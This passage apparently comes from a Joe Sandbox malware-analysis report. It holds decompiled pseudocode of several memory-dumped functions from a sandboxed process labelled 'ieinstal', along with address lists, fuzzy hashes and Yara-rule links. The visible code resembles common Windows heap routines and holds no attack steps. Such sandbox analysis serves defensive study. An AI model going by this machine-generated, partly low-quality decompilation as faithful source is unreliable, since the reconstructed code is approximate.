								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E1F002DC0();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E1F002A80();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1f0b5d78; // 0x0
									_t92 = E1EFD5D90(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E1F002DC0();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t119 + _t114 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t119 + _t114 - 4) =  *(_t119 + _t114 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t119 + _t124[3])) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E1EFFBFA0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E1F05934D(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E1F05934D(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E1F002A60();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x1f055e39
0x1f055e44
0x00000000
0x1f055e46
0x1f055e53
0x1f055e55
0x1f055e55
0x1f055e58
0x1f055e80
0x1f055e84
0x1f055e96
0x1f055e99
0x1f055e9d
0x1f055ea8
0x1f055f00
0x1f055f00
0x1f055f04
0x1f055f1f
0x1f055f24
0x1f055f26
0x1f055f2d
0x1f055f31
0x1f056034
0x1f056038
0x1f05603a
0x1f05603c
0x1f05603c
0x1f05603f
0x1f056040
0x1f056042
0x1f056044
0x1f05604c
0x1f05604e
0x1f056050
0x1f056050
0x1f05604c
0x1f05605b
0x1f05605c
0x1f05605e
0x1f056061
0x1f056061
0x00000000
0x1f056066
0x1f055f37
0x1f055f3b
0x1f055f3b
0x1f055f3e
0x1f055f3e
0x1f055f44
0x1f055f47
0x1f055f4a
0x1f055f4c
0x1f055f4f
0x1f055f53
0x1f055f7b
0x1f055f7b
0x1f055f83
0x1f055f84
0x1f055f87
0x1f055f8a
0x1f055f8b
0x1f055f8e
0x1f055f90
0x1f055f97
0x1f055f9f
0x1f055ffc
0x1f056002
0x1f056071
0x1f056073
0x1f05600e
0x1f05600e
0x1f056013
0x1f056015
0x1f05601a
0x1f056028
0x1f056028
0x1f05601a
0x1f05602d
0x1f05602f
0x00000000
0x1f05602f
0x1f056078
0x00000000
0x1f05607a
0x1f056007
0x1f05606f
0x00000000
0x1f05606f
0x1f056009
0x00000000
0x00000000
0x00000000
0x00000000
0x1f055fa1
0x1f055fa1
0x1f055fa1
0x1f055fb8
0x1f055fbd
0x1f055fc2
0x00000000
0x00000000
0x1f055fc4
0x1f055fc7
0x1f055fc8
0x1f055fc9
0x1f055fcc
0x1f055fcf
0x1f055fd1
0x1f055fd8
0x1f055fe0
0x00000000
0x00000000
0x1f055ff0
0x1f055ff0
0x1f055ff7
0x00000000
0x1f055ff7
0x1f055f55
0x1f055f57
0x1f055f57
0x1f055f5a
0x1f055f63
0x1f055f67
0x1f055f6c
0x1f055f70
0x1f055f77
0x00000000
0x1f055f57
0x1f055f06
0x1f055f08
0x1f055f0f
0x1f055f13
0x00000000
0x00000000
0x1f055f19
0x00000000
0x1f055f19
0x1f055ead
0x1f055eef
0x1f055ef5
0x1f055ef9
0x1f055ec0
0x1f055ec7
0x1f055ec8
0x1f055eca
0x00000000
0x1f055eca
0x1f055efb
0x1f055efe
0x00000000
0x00000000
0x00000000
0x1f055efe
0x1f055eb1
0x1f055eb4
0x1f055eba
0x1f055ebe
0x1f055ed2
0x1f055ed9
0x1f055edd
0x1f055edf
0x1f055ee0
0x1f055ee2
0x1f055ee4
0x00000000
0x1f055ee4
0x00000000
0x1f055e86
0x00000000
0x1f055e86

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3808af3bb2106c9ef38bf1af5783989067f469b360e82f33565db35b70d0d4a1
Instruction ID: 07b3d88ef8c50c276f3f995d4e80414bbf16203d51eaedec557ed639f80320de
Opcode Fuzzy Hash: 3808af3bb2106c9ef38bf1af5783989067f469b360e82f33565db35b70d0d4a1
Instruction Fuzzy Hash: D671C176200701EFE721CF24CD44F5AB7E5EF84764F114928E6568B2A0EBB6F948CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFCCD1 Relevance: .2, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1EFFCCD1(char __ecx, signed int __edx, signed int _a4) {
				char _v9;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				signed char _v48;
				signed int _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t58;
				signed int _t61;
				signed int _t69;
				signed int _t78;
				signed int* _t96;
				signed int _t98;
				intOrPtr* _t101;
				signed char _t105;
				intOrPtr _t116;
				signed int _t120;
				signed int* _t124;
				intOrPtr* _t133;
				signed int _t135;
				signed int _t137;

				_t129 = __edx;
				_t58 = _a4;
				_v36 = __edx;
				_v20 =  *[fs:0x30];
				_t105 = _t58 + 2;
				_v48 = _t105;
				_v40 = __ecx;
				_t61 = 1 << _t105;
				_t133 = 0x1f0b933c + _t58 * 0xc;
				_v9 = 0;
				if(( *(_v20 + 0x28) & 1) != 0) {
					_v56 = __ecx;
					_t137 = 0;
					__eflags = 0;
					_v52 = __edx;
					L1EFD2330(_t61,  *_t133);
					_t101 =  *((intOrPtr*)(_t133 + 4));
					while(1) {
						__eflags = _t101 - _t133 + 4;
						if(_t101 == _t133 + 4) {
							break;
						}
						_v24 = _t101;
						_v44 = _t101 + 8;
						asm("lock xadd [eax], ecx");
						__eflags = 2 - 1;
						if(2 <= 1) {
							_push(0xe);
							_pop(2);
							asm("int 0x29");
						}
						E1EFD24D0( *_t133);
						_t129 =  *0x1f0b65fc; // 0x1dd48a8c
						_v16 =  *((intOrPtr*)(_t101 + 0x10));
						__eflags = _t129;
						if(_t129 == 0) {
							_push(0);
							_push(4);
							_push( &_v32);
							_push(0x24);
							_push(0xffffffff);
							_t78 = E1F002B20();
							__eflags = _t78;
							if(_t78 < 0) {
								L1F018AA0(2, _t129, _t78);
								goto L27;
							}
							_t129 = _v32;
							 *0x1f0b65fc = _t129;
							goto L6;
						} else {
							L6:
							_v28 = _v28 & 0x00000000;
							_push(0x20);
							asm("ror eax, cl");
							_t116 = _v20;
							_t83 = _v16 ^ _t129;
							_v16 = _v16 ^ _t129;
							__eflags =  *(_t116 + 0x68) & 0x00800000;
							if(( *(_t116 + 0x68) & 0x00800000) != 0) {
								_v28 = E1F078C65(_v40, _v36, _t116, _t83);
								_t83 = _v16;
							}
							 *0x1f0b91e0( &_v56);
							_t87 =  *_v16();
							_t120 = _v28;
							_t129 = _t87;
							_v16 = _t129;
							__eflags = _t120;
							if(_t120 != 0) {
								__eflags = _t129 - 0xffffffff;
								_t87 = 0 | __eflags != 0x00000000;
								 *(_t120 + 0x320) = __eflags != 0;
							}
							L1EFD2330(_t87,  *_t133);
							_t101 =  *_t101;
							asm("lock xadd [eax], ecx");
							__eflags = (_t120 | 0xffffffff) - 1;
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t47 = _v24 + 0xc; // 0x1c244c8d
									__eflags =  *_t47;
									if( *_t47 == 0) {
										_push(0x3c);
										L29:
										asm("int 0x29");
										L30:
										E1EFFC640(_t101, 0, _t129, _t133);
										__eflags = 0;
										do {
											_t135 = _t137;
											_t137 =  *_t137;
											E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t135 + 8)));
											_t69 = E1EFE0130();
											_push(_t135);
											_push(0);
											__eflags = _t69;
											if(_t69 != 0) {
												_push( *0x1f0b921c);
											} else {
												_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
											}
											E1EFD3BC0();
											__eflags = _t137;
										} while (_t137 != 0);
										E1EFFC640(0, 1, _t129, _t135);
										goto L1;
									}
									E1EFFC640(_t101, 0, _t129, _t133);
									E1EFF1D66(0, _t129, 0);
									_t124 = _v24;
									_t129 =  *_t124;
									__eflags =  *(_t129 + 4) - _t124;
									if( *(_t129 + 4) != _t124) {
										L27:
										_push(3);
										goto L29;
									}
									_t50 =  &(_t124[1]); // 0xf2
									_t96 =  *_t50;
									__eflags =  *_t96 - _t124;
									if( *_t96 != _t124) {
										goto L27;
									}
									 *_t96 = _t129;
									 *(_t129 + 4) = _t96;
									__eflags = _t96 - _t129;
									if(_t96 == _t129) {
										_t124 = _v20 + 0x28;
										asm("lock btr [ecx], eax");
									}
									E1EFF1D66(_t124, _t129, 1);
									_t98 = _v24;
									 *_t98 = _t137;
									_t137 = _t98;
									E1EFFC640(_t101, 1, _t129, _t133);
									goto L9;
								}
								_push(0xe);
								asm("int 0x29");
								goto L9;
							} else {
								L9:
								__eflags = _v16 - 0xffffffff;
								if(_v16 != 0xffffffff) {
									continue;
								}
								_v9 = 1;
								break;
							}
						}
					}
					E1EFD24D0( *_t133);
					__eflags = _t137;
					if(_t137 == 0) {
						goto L1;
					}
					goto L30;
				}
				L1:
				return _v9;
			}

0x1effccd1
0x1effccd9
0x1effcce0
0x1effccee
0x1effccf1
0x1effccf6
0x1effccfa
0x1effccfd
0x1effcd02
0x1effcd08
0x1effcd0f
0x1effcd1d
0x1effcd20
0x1effcd20
0x1effcd22
0x1effcd25
0x1effcd2a
0x1effcd2d
0x1effcd30
0x1effcd32
0x00000000
0x00000000
0x1effcd3b
0x1effcd40
0x1effcd46
0x1effcd4b
0x1effcd4e
0x1f0387ff
0x1f038801
0x1f038802
0x1f038802
0x1effcd56
0x1effcd5b
0x1effcd64
0x1effcd67
0x1effcd69
0x1f038809
0x1f03880b
0x1f038810
0x1f038811
0x1f038813
0x1f038815
0x1f03881a
0x1f03881c
0x1f0388c2
0x00000000
0x1f0388c2
0x1f038822
0x1f038825
0x00000000
0x1effcd6f
0x1effcd6f
0x1effcd6f
0x1effcd78
0x1effcd80
0x1effcd82
0x1effcd85
0x1effcd87
0x1effcd8a
0x1effcd91
0x1f03883d
0x1f038840
0x1f038840
0x1effcd9d
0x1effcda6
0x1effcda8
0x1effcdab
0x1effcdad
0x1effcdb0
0x1effcdb2
0x1f03884a
0x1f03884d
0x1f038850
0x1f038850
0x1effcdba
0x1effcdc5
0x1effcdc9
0x1effcdce
0x1effcdd0
0x1f03885b
0x1f03886a
0x1f03886d
0x1f03886f
0x1f0388cb
0x1f0388cd
0x1f0388ce
0x1f0388d0
0x1f0388d2
0x1f0388d7
0x1f0388d9
0x1f0388df
0x1f0388e1
0x1f0388ea
0x1f0388ef
0x1f0388f4
0x1f0388f5
0x1f0388f6
0x1f0388f8
0x1f038905
0x1f0388fa
0x1f038900
0x1f038900
0x1f03890b
0x1f038910
0x1f038910
0x1f038917
0x00000000
0x1f038917
0x1f038873
0x1f03887a
0x1f03887f
0x1f038882
0x1f038884
0x1f038887
0x1f0388c7
0x1f0388c7
0x00000000
0x1f0388c7
0x1f038889
0x1f038889
0x1f03888c
0x1f03888e
0x00000000
0x00000000
0x1f038890
0x1f038892
0x1f038895
0x1f038897
0x1f03889f
0x1f0388a2
0x1f0388a2
0x1f0388a8
0x1f0388ad
0x1f0388b3
0x1f0388b5
0x1f0388b7
0x00000000
0x1f0388b7
0x1f03885d
0x1f038860
0x00000000
0x1effcdd6
0x1effcdd6
0x1effcdd6
0x1effcdda
0x00000000
0x00000000
0x1effcde0
0x00000000
0x1effcde0
0x1effcdd0
0x1effcd69
0x1effcde6
0x1effcdeb
0x1effcded
0x00000000
0x00000000
0x00000000
0x1effcdf3
0x1effcd11
0x1effcd18

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606b74a156ebbbb26194345d00fc6f4b3d86648a05a49f407dd46c3b1f9dc7e5
Instruction ID: 6b8e57125097c57de17814b8bab9435568952b7e2e344fa43a3899287f450011
Opcode Fuzzy Hash: 606b74a156ebbbb26194345d00fc6f4b3d86648a05a49f407dd46c3b1f9dc7e5
Instruction Fuzzy Hash: 3361AE76E00256DFDB08DF68C890B9EBBF5FF09714F1146AAE911AB290D731AA01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBCEF0 Relevance: .2, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBCEF0(void* __ecx, signed int* _a4, signed int _a8) {
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t123;
				signed int _t131;
				signed int* _t134;

				_t134 = _a4;
				_t131 = 0;
				if(_t134 == 0) {
					L70:
					_t131 = 0xc000000d;
					L15:
					return _t131;
				}
				_t123 = _a8;
				if(_t123 == 0) {
					goto L70;
				}
				if((_t123 & 0x00000400) != 0) {
					_t123 = 0xfff;
				}
				if((_t123 & 0x00000001) != 0) {
					if(_t134[5] != _t131) {
						if(( *_t134 & 0x00000001) != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[5]);
						}
						_t134[5] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffe;
				}
				if((_t123 & 0x00000002) != 0) {
					if(_t134[6] != _t131) {
						if(( *_t134 & 0x00000002) != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[6]);
						}
						_t134[6] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffd;
				}
				if((_t123 & 0x00000004) != 0) {
					if(_t134[7] != _t131) {
						if(( *_t134 & 0x00000004) != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[7]);
						}
						_t134[7] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffb;
				}
				if((_t123 & 0x00000008) != 0) {
					if(_t134[8] != _t131) {
						if(( *_t134 & 0x00000008) != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[8]);
						}
						_t134[8] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffff7;
				}
				if((_t123 & 0x00000010) != 0) {
					_t97 = _t134[9];
					if(_t97 != 0) {
						if(( *_t134 & 0x00000010) != 0) {
							 *(_t97 + 0x20) =  *(_t97 + 0x20) & 0xffffffbf;
							E1EFE332D(_t134[9]);
						}
						_t134[9] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffef;
				}
				if((_t123 & 0x00000020) != 0) {
					_t98 = _t134[0xa];
					if(_t98 != 0) {
						if(( *_t134 & 0x00000020) != 0) {
							 *(_t98 + 0x20) =  *(_t98 + 0x20) & 0xffffffbf;
							E1EFE332D(_t134[0xa]);
						}
						_t134[0xa] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffdf;
				}
				if((_t123 & 0x00000040) != 0) {
					_t99 = _t134[0xd];
					if(_t99 != 0) {
						if(( *_t134 & 0x00000040) != 0) {
							 *(_t99 + 0x20) =  *(_t99 + 0x20) & 0xffffffbf;
							E1EFE332D(_t134[0xd]);
						}
						_t134[0xd] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffbf;
				}
				if(_t123 < 0) {
					_t100 = _t134[0xc];
					if(_t100 != 0) {
						if(( *_t134 & 0x00000080) != 0) {
							 *(_t100 + 0x20) =  *(_t100 + 0x20) & 0xffffffbf;
							E1EFE332D(_t134[0xc]);
						}
						_t134[0xc] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffff7f;
				}
				_t125 = 0x200;
				if((0x00000200 & _t123) != 0) {
					_t101 = _t134[0xe];
					if(_t101 != 0) {
						if(( *_t134 & 0x00000200) != 0) {
							 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0xffffffbf;
							_t125 = _t134[0xe];
							E1EFE332D(_t134[0xe]);
						}
						_t134[0xe] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffdff;
				}
				if((0x00000800 & _t123) != 0) {
					if(_t134[0x14] != _t131) {
						if(( *_t134 & 0x00000800) != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0x14]);
						}
						_t134[0x14] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffff7ff;
				}
				if((_t123 & 0x00000fff) != 0 && _t134[0xf] != _t131) {
					E1EFBCEF0(_t125, _t134[0xf], _t123);
					if(_t134[0xf] != _t131) {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0xf]);
					}
					_t134[0xf] = _t131;
				}
			}

0x1efbcefb
0x1efbceff
0x1efbcf03
0x1f01a50a
0x1f01a50a
0x1efbcf82
0x1efbcf8a
0x1efbcf8a
0x1efbcf09
0x1efbcf0e
0x00000000
0x00000000
0x1efbcf1a
0x1f01a3b7
0x1f01a3b7
0x1efbcf23
0x1efbcfcf
0x1f01a3c4
0x1f01a3d3
0x1f01a3d3
0x1f01a3d8
0x1f01a3d8
0x1efbcfd5
0x1efbcfd5
0x1efbcf2c
0x1efbcfe0
0x1f01a3e3
0x1f01a3f2
0x1f01a3f2
0x1f01a3f7
0x1f01a3f7
0x1efbcfe6
0x1efbcfe6
0x1efbcf35
0x1efbcf90
0x1f01a402
0x1f01a411
0x1f01a411
0x1f01a416
0x1f01a416
0x1efbcf96
0x1efbcf96
0x1efbcf3a
0x1efbcf9e
0x1f01a421
0x1f01a430
0x1f01a430
0x1f01a435
0x1f01a435
0x1efbcfa4
0x1efbcfa4
0x1efbcf3f
0x1efbcfa9
0x1efbcfae
0x1f01a440
0x1f01a442
0x1f01a449
0x1f01a449
0x1f01a44e
0x1f01a44e
0x1efbcfb4
0x1efbcfb4
0x1efbcf44
0x1efbcfb9
0x1efbcfbe
0x1f01a459
0x1f01a45b
0x1f01a462
0x1f01a462
0x1f01a467
0x1f01a467
0x1efbcfc4
0x1efbcfc4
0x1efbcf49
0x1efbcfee
0x1efbcff3
0x1f01a472
0x1f01a474
0x1f01a47b
0x1f01a47b
0x1f01a480
0x1f01a480
0x1efbcff9
0x1efbcff9
0x1efbcf51
0x1efbd001
0x1efbd006
0x1f01a48b
0x1f01a48d
0x1f01a494
0x1f01a494
0x1f01a499
0x1f01a499
0x1efbd00c
0x1efbd00c
0x1efbcf57
0x1efbcf5e
0x1efbd017
0x1efbd01c
0x1f01a4a3
0x1f01a4a5
0x1f01a4a9
0x1f01a4ac
0x1f01a4ac
0x1f01a4b1
0x1f01a4b1
0x1efbd022
0x1efbd022
0x1efbcf6b
0x1f01a4bc
0x1f01a4c0
0x1f01a4cf
0x1f01a4cf
0x1f01a4d4
0x1f01a4d4
0x1f01a4d7
0x1f01a4d7
0x1efbcf77
0x1f01a4e6
0x1f01a4ee
0x1f01a4fd
0x1f01a4fd
0x1f01a502
0x1f01a502

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
Instruction ID: 509d2e6d8c6fd0c739f8a343da0b5e1dc2cf0f60d51e027815a1ed009e0c38f2
Opcode Fuzzy Hash: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
Instruction Fuzzy Hash: 86716A72955B829BC3259F26C664B22B7E1FF80761F100B6DEDD24A9E1E731F481CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1F080EAD Relevance: .2, Instructions: 188
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1F080EAD(signed int __ecx, intOrPtr* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed short _v12;
				intOrPtr* _v16;
				signed int _v20;
				short _v22;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				void* _v44;
				void* __ebx;
				intOrPtr* _t110;
				intOrPtr* _t114;
				signed int _t120;
				void* _t125;
				signed int _t126;
				signed int _t129;
				intOrPtr _t130;
				char* _t137;
				intOrPtr* _t157;
				signed int _t162;
				intOrPtr _t164;
				signed int _t167;
				signed short* _t171;
				signed int _t172;
				intOrPtr* _t175;
				signed int _t188;
				signed short _t192;
				signed short _t195;
				intOrPtr _t196;
				signed short _t206;
				unsigned int _t208;
				intOrPtr _t209;
				intOrPtr* _t215;
				signed int _t219;

				_t157 = __edx;
				_v20 = __ecx;
				_v36 = __edx;
				if((_a8 & 0x00000003) != 0) {
					_t162 =  *(__edx + 0x1b) & 0x000000ff;
					_t188 =  *(_a20 + 2) & 0x000000ff;
					_v40 =  *((intOrPtr*)(__edx + 0x10));
					if(_t162 != 0) {
						_t110 =  *((intOrPtr*)(__ecx + 0x5c4 + _t188 * 4)) + 0xffffff98 + _t162 * 0x68;
					} else {
						_t110 =  *((intOrPtr*)(__ecx + 0x3c0 + _t188 * 4));
					}
					_t164 = _a12;
					_v16 = _t110;
					_v8 = (_t164 + 0x00001007 & 0xfffff000) + 0x1000;
					_t114 = _a4;
					 *_t114 = _t157;
					_t192 = (_t114 - (_t114 + 0x0000101f & 0xfffff000) + _a16) / _v8;
					 *((short*)(_t157 + 0x14)) = _t164 + 8 >> 3;
					_t120 = _t192 & 0x0000ffff;
					_v32 = _t120;
					 *(_t157 + 0x18) = _t120;
					 *_t157 = _v16;
					_v12 = _t192;
					 *((char*)(_t157 + 0x1a)) =  *(_a20 + 2);
					 *((short*)(_t157 + 0x16)) = _a8;
					_v22 = _v8;
					_t125 = E1F080DBF(_t157, _t114 + 0x0000101f & 0xfffff000);
					_t167 =  *0x1f0b6964; // 0x44dfd738
					_t126 = _a4;
					_t206 = _t125 - _t126;
					_v24 = _t206;
					 *(_t126 + 0x10) = _t167 ^ _v24 ^ _v20 ^ _t126;
					_t171 = _t126 + 0x14;
					 *_t171 = _v12;
					_t171[2] = _t126 + 0x1c;
					E1F089D29(_t171);
					_t172 = _a4;
					_t195 = 0;
					_t208 = (_t206 & 0x0000ffff) + _t172;
					_v24 = 0;
					if(_v12 <= 0) {
						L9:
						 *(_t157 + 4) = _t172;
						 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
						 *(_t157 + 0xc) =  *(_t157 + 0xc) & 0x00000000;
						_t215 = _v16 + 0x50;
						do {
							_t129 =  *_t215;
							_t209 =  *((intOrPtr*)(_t215 + 4));
							_v28 = _t129;
							if(_v12 <= 0) {
							}
							_t196 = _t209;
							asm("lock cmpxchg8b [esi]");
						} while (_t129 != _v28 || _t196 != _t209);
						_t175 = _v16;
						_v24 = _v24 & 0x00000000;
						_t130 =  *_t175;
						 *((intOrPtr*)(_t130 + 0x10)) =  *((intOrPtr*)(_t130 + 0x10)) + 1;
						 *((intOrPtr*)(_t175 + 0x58)) =  *((intOrPtr*)(_t130 + 0x10));
						_v24 = _v32;
						asm("lock or [eax], ecx");
						_t210 = _v36;
						 *((intOrPtr*)(_a4 + 0xc)) = 0xf0e0d0c0;
						 *((intOrPtr*)(_v36 + 0x1c)) = 1;
						asm("lock cmpxchg [edx], ecx");
						if(E1EFD3C40() == 0) {
							_t137 = 0x7ffe0380;
						} else {
							_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t137 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E1F07F68C(1,  *((intOrPtr*)(_v20 + 0xc)),  *((intOrPtr*)(_t210 + 4)),  *(_t210 + 0x14) & 0x0000ffff,  *(_t210 + 0x18) & 0x0000ffff,  *(_t210 + 0x1b) & 0x000000ff);
						}
						return 1;
					} else {
						_v28 = _v8 << 0xd;
						_t219 = _t208 - _t172 << 0xd;
						do {
							 *_t208 = _t208 >> 0x00000003 ^ _t219 ^  *0x1f0b6964 ^  *(_v20 + 0xc);
							 *(_t208 + 4) = (_t195 & 0x0000ffff) << 0x00000008 |  *(_t208 + 4) & 0xff0000ff;
							 *((char*)(_t208 + 7)) = 0x80;
							E1F080E4F(_t157, _t208);
							_t208 = _t208 + _v8;
							_t219 = _t219 + _v28;
							_t195 = _v24 + 1;
							_v24 = _t195;
						} while (_t195 < _v12);
						_t172 = _a4;
						goto L9;
					}
				}
				return 0;
			}

0x1f080ebc
0x1f080ebe
0x1f080ec1
0x1f080ec4
0x1f080ed4
0x1f080ed8
0x1f080edc
0x1f080ee2
0x1f080efa
0x1f080ee4
0x1f080ee4
0x1f080ee4
0x1f080efc
0x1f080f04
0x1f080f14
0x1f080f17
0x1f080f1a
0x1f080f2e
0x1f080f39
0x1f080f3d
0x1f080f40
0x1f080f43
0x1f080f4a
0x1f080f4e
0x1f080f56
0x1f080f5d
0x1f080f64
0x1f080f68
0x1f080f6d
0x1f080f75
0x1f080f78
0x1f080f7d
0x1f080f89
0x1f080f8c
0x1f080f92
0x1f080f94
0x1f080f97
0x1f080f9c
0x1f080f9f
0x1f080fa4
0x1f080fa6
0x1f080fac
0x1f081008
0x1f08100b
0x1f08100e
0x1f081012
0x1f081016
0x1f081019
0x1f081019
0x1f081020
0x1f081023
0x1f08102c
0x1f08102c
0x1f081031
0x1f081034
0x1f081038
0x1f081041
0x1f081044
0x1f081048
0x1f08104a
0x1f081050
0x1f081058
0x1f08105f
0x1f081067
0x1f08106e
0x1f08107b
0x1f08107e
0x1f081089
0x1f08109b
0x1f08108b
0x1f081094
0x1f081094
0x1f0810a3
0x1f0810cf
0x1f0810cf
0x00000000
0x1f080fae
0x1f080fb8
0x1f080fbb
0x1f080fbe
0x1f080fd1
0x1f080fe5
0x1f080fea
0x1f080fee
0x1f080ff6
0x1f080ff9
0x1f080ffc
0x1f080ffd
0x1f081000
0x1f081005
0x00000000
0x1f081005
0x1f080fac
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed63b2f8f0fb073caa601b807317089945b072ac80f8a1d184350dab169bd681
Instruction ID: e481a67e5254427ffe7673543787200ba3cd5459ea7e537e26f76a56ff306e48
Opcode Fuzzy Hash: ed63b2f8f0fb073caa601b807317089945b072ac80f8a1d184350dab169bd681
Instruction Fuzzy Hash: 98815C75A00249DFCB09CFA8C890AAEBBF1FF48310F1581A9D859EB355D734EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1F088BBE Relevance: .2, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1F088BBE(signed int __ecx, signed int __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
